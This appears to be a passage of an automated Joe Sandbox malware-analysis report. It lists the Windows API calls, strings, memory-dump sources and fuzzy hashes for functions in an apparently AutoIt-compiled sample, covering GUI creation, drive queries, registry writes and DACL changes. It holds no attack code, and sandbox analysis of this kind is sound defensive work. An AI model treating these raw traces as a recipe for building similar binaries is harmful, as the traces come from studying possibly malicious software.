                                                                                                    • DestroyWindow.USER32(00000000), ref: 00B2273E
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B2286A
                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00B228A9
                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00B228B9
                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00B22900
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00B2290C
                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00B22955
                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B22964
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00B22974
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00B22978
                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00B22988
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B22991
                                                                                                    • DeleteDC.GDI32(00000000), ref: 00B2299A
                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B229C6
                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B229DD
                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00B22A1D
                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B22A31
                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B22A42
                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00B22A77
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00B22A82
                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B22A8D
                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00B22A97
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                    • API String ID: 2910397461-517079104
                                                                                                    • Opcode ID: cde8d1ed20af1e50b3bbbb4b9dbc2a2da497b6437412d6667c166bd855f65495
                                                                                                    • Instruction ID: 2da448dcdabc46b93cb06d07a6c08f88f151445bb0d052f39d928260d156357e
                                                                                                    • Opcode Fuzzy Hash: cde8d1ed20af1e50b3bbbb4b9dbc2a2da497b6437412d6667c166bd855f65495
                                                                                                    • Instruction Fuzzy Hash: 0AB17E71A00215BFEB14DFA8DC86EAE7BB9EB08710F104554F919EB2A1DB70ED40CB64
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00B14AED
                                                                                                    • GetDriveTypeW.KERNEL32(?,00B3CB68,?,\\.\,00B3CC08), ref: 00B14BCA
                                                                                                    • SetErrorMode.KERNEL32(00000000,00B3CB68,?,\\.\,00B3CC08), ref: 00B14D36
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                    • Opcode ID: 2782d6ae76f12ef417bc7b157533cf355b53bb24c34247b3136e41f5e64a7e16
                                                                                                    • Instruction ID: aa5e35480434087a806baf32da070a510cc5be5324fdf25e885a76947ab3c825
                                                                                                    • Opcode Fuzzy Hash: 2782d6ae76f12ef417bc7b157533cf355b53bb24c34247b3136e41f5e64a7e16
                                                                                                    • Instruction Fuzzy Hash: 8461B030605106EBCB04DF24CAC1DEDB7E0EB46740BA484E5F806AB2A1DB39ED81DB81
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000012), ref: 00B37421
                                                                                                    • SetTextColor.GDI32(?,?), ref: 00B37425
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00B3743B
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00B37446
                                                                                                    • CreateSolidBrush.GDI32(?), ref: 00B3744B
                                                                                                    • GetSysColor.USER32(00000011), ref: 00B37463
                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B37471
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00B37482
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00B3748B
                                                                                                    • SelectObject.GDI32(?,?), ref: 00B37498
                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00B374B7
                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B374CE
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00B374DB
                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B3752A
                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B37554
                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00B37572
                                                                                                    • DrawFocusRect.USER32(?,?), ref: 00B3757D
                                                                                                    • GetSysColor.USER32(00000011), ref: 00B3758E
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00B37596
                                                                                                    • DrawTextW.USER32(?,00B370F5,000000FF,?,00000000), ref: 00B375A8
                                                                                                    • SelectObject.GDI32(?,?), ref: 00B375BF
                                                                                                    • DeleteObject.GDI32(?), ref: 00B375CA
                                                                                                    • SelectObject.GDI32(?,?), ref: 00B375D0
                                                                                                    • DeleteObject.GDI32(?), ref: 00B375D5
                                                                                                    • SetTextColor.GDI32(?,?), ref: 00B375DB
                                                                                                    • SetBkColor.GDI32(?,?), ref: 00B375E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                    • String ID:
                                                                                                    • API String ID: 1996641542-0
                                                                                                    • Opcode ID: 929cfa7d4ab916866e7e492c49b0aabfeb82bc62ab841ff1b9f2f87f72f8bd00
                                                                                                    • Instruction ID: aa7383f9480a977e2757e91727bb9c47e23097a32de8f9fbfed9978cac7c4882
                                                                                                    • Opcode Fuzzy Hash: 929cfa7d4ab916866e7e492c49b0aabfeb82bc62ab841ff1b9f2f87f72f8bd00
                                                                                                    • Instruction Fuzzy Hash: 80616A72900218AFDF119FA4DC49EEEBFB9EB08320F214155F915BB2A1DB75A940DB90
                                                                                                    APIs
                                                                                                    • GetCursorPos.USER32(?), ref: 00B31128
                                                                                                    • GetDesktopWindow.USER32 ref: 00B3113D
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00B31144
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B31199
                                                                                                    • DestroyWindow.USER32(?), ref: 00B311B9
                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B311ED
                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B3120B
                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B3121D
                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00B31232
                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00B31245
                                                                                                    • IsWindowVisible.USER32(00000000), ref: 00B312A1
                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00B312BC
                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00B312D0
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B312E8
                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00B3130E
                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00B31328
                                                                                                    • CopyRect.USER32(?,?), ref: 00B3133F
                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00B313AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                    • API String ID: 698492251-4156429822
                                                                                                    • Opcode ID: 0ebf12fafd7e2e639366b1959a5e5b2137d13b965ebd020526d899df6447211a
                                                                                                    • Instruction ID: f1491cb685e7be85f2bef20a734a28651aa3c35138805a40feca7f3089243570
                                                                                                    • Opcode Fuzzy Hash: 0ebf12fafd7e2e639366b1959a5e5b2137d13b965ebd020526d899df6447211a
                                                                                                    • Instruction Fuzzy Hash: EBB17C71604341AFD704DF68C985B6FBBE8FF85350F108958F999AB2A1CB31E844CBA1
                                                                                                    APIs
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00B302E5
                                                                                                    • _wcslen.LIBCMT ref: 00B3031F
                                                                                                    • _wcslen.LIBCMT ref: 00B30389
                                                                                                    • _wcslen.LIBCMT ref: 00B303F1
                                                                                                    • _wcslen.LIBCMT ref: 00B30475
                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B304C5
                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B30504
                                                                                                      • Part of subcall function 00ABF9F2: _wcslen.LIBCMT ref: 00ABF9FD
                                                                                                      • Part of subcall function 00B0223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B02258
                                                                                                      • Part of subcall function 00B0223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B0228A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                    • API String ID: 1103490817-719923060
                                                                                                    • Opcode ID: b3c4995ba6b6d22b5ed693ec34f8b3f0a2ed47d456dcd311ca4a4410508ccff9
                                                                                                    • Instruction ID: 40b451e876e3b6ee317c33f50f5d7247cca0913c06761995e67cbef4a579ce1a
                                                                                                    • Opcode Fuzzy Hash: b3c4995ba6b6d22b5ed693ec34f8b3f0a2ed47d456dcd311ca4a4410508ccff9
                                                                                                    • Instruction Fuzzy Hash: 92E1A0312282018FC714EF24C9A196EB7E6FF98714F24499CF8969B3A6DB30ED45CB51
                                                                                                    APIs
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AB8968
                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00AB8970
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AB899B
                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00AB89A3
                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00AB89C8
                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AB89E5
                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AB89F5
                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AB8A28
                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AB8A3C
                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00AB8A5A
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00AB8A76
                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AB8A81
                                                                                                      • Part of subcall function 00AB912D: GetCursorPos.USER32(?), ref: 00AB9141
                                                                                                      • Part of subcall function 00AB912D: ScreenToClient.USER32(00000000,?), ref: 00AB915E
                                                                                                      • Part of subcall function 00AB912D: GetAsyncKeyState.USER32(00000001), ref: 00AB9183
                                                                                                      • Part of subcall function 00AB912D: GetAsyncKeyState.USER32(00000002), ref: 00AB919D
                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00AB90FC), ref: 00AB8AA8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                    • API String ID: 1458621304-248962490
                                                                                                    • Opcode ID: 8fd0ef4f08bd4cdd3d003c6d388806437b72ebdc13d163ead8bf824c38a4a7fb
                                                                                                    • Instruction ID: 7c2d173481e8de47f4fc9db8ef6e4b8cf86487ee16beed05953a8721c30ee8ab
                                                                                                    • Opcode Fuzzy Hash: 8fd0ef4f08bd4cdd3d003c6d388806437b72ebdc13d163ead8bf824c38a4a7fb
                                                                                                    • Instruction Fuzzy Hash: D3B16B71A00209AFDF14DFACCD46BEE7BB9FB48314F114229FA15A7291DB34A841CB61
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B01114
                                                                                                      • Part of subcall function 00B010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01120
                                                                                                      • Part of subcall function 00B010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B0112F
                                                                                                      • Part of subcall function 00B010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01136
                                                                                                      • Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B0114D
                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B00DF5
                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B00E29
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00B00E40
                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00B00E7A
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B00E96
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00B00EAD
                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B00EB5
                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00B00EBC
                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B00EDD
                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00B00EE4
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B00F13
                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B00F35
                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B00F47
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00F6E
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B00F75
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00F7E
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B00F85
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00F8E
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B00F95
                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00B00FA1
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B00FA8
                                                                                                      • Part of subcall function 00B01193: GetProcessHeap.KERNEL32(00000008,00B00BB1,?,00000000,?,00B00BB1,?), ref: 00B011A1
                                                                                                      • Part of subcall function 00B01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B00BB1,?), ref: 00B011A8
                                                                                                      • Part of subcall function 00B01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B00BB1,?), ref: 00B011B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 4175595110-0
                                                                                                    • Opcode ID: 5eac7e96c5f6f5a758d2c1ee860c5dee6a93a85fc0a079908af8ea7dc2290ff8
                                                                                                    • Instruction ID: 3b82d2801aca08d53d167a615eec04e00b986dcc13c59de380610a65774f45a2
                                                                                                    • Opcode Fuzzy Hash: 5eac7e96c5f6f5a758d2c1ee860c5dee6a93a85fc0a079908af8ea7dc2290ff8
                                                                                                    • Instruction Fuzzy Hash: E6715B7290020AEBDB20AFA4DC48FAEBFB8FF05301F244195FA59B7191DB719905DB60
                                                                                                    APIs
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2C4BD
                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B3CC08,00000000,?,00000000,?,?), ref: 00B2C544
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00B2C5A4
                                                                                                    • _wcslen.LIBCMT ref: 00B2C5F4
                                                                                                    • _wcslen.LIBCMT ref: 00B2C66F
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00B2C6B2
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00B2C7C1
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00B2C84D
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B2C881
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00B2C88E
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00B2C960
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                    • API String ID: 9721498-966354055
                                                                                                    • Opcode ID: 77097243b82d06a5ffcfc6de554cac3378a7cf2f30ab25a5a9aac2e8f5610094
                                                                                                    • Instruction ID: 1a4dbdb51c90855f2069d9a0fd21cc94dfd9595b7bafd2d53065c8e3765e5fb2
                                                                                                    • Opcode Fuzzy Hash: 77097243b82d06a5ffcfc6de554cac3378a7cf2f30ab25a5a9aac2e8f5610094
                                                                                                    • Instruction Fuzzy Hash: C41278356042119FDB14EF14D991E2EBBE5EF89714F14889CF88A9B3A2DB31ED41CB81
                                                                                                    APIs
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00B309C6
                                                                                                    • _wcslen.LIBCMT ref: 00B30A01
                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B30A54
                                                                                                    • _wcslen.LIBCMT ref: 00B30A8A
                                                                                                    • _wcslen.LIBCMT ref: 00B30B06
                                                                                                    • _wcslen.LIBCMT ref: 00B30B81
                                                                                                      • Part of subcall function 00ABF9F2: _wcslen.LIBCMT ref: 00ABF9FD
                                                                                                      • Part of subcall function 00B02BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B02BFA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                    • Opcode ID: 517c781cf118395427ac96ab8dffb7335f5ea317bb7e007d751fa46cfa4d73c6
                                                                                                    • Instruction ID: 223c2041871d91c53dbc0e987ddcfc94b269ecd9ff45a1bf41b3d5ee708cabf2
                                                                                                    • Opcode Fuzzy Hash: 517c781cf118395427ac96ab8dffb7335f5ea317bb7e007d751fa46cfa4d73c6
                                                                                                    • Instruction Fuzzy Hash: CFE19E352183019FC714EF24C5A096AB7E1FF99714F2489ACF8969B3A2DB31ED45CB81
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharUpper
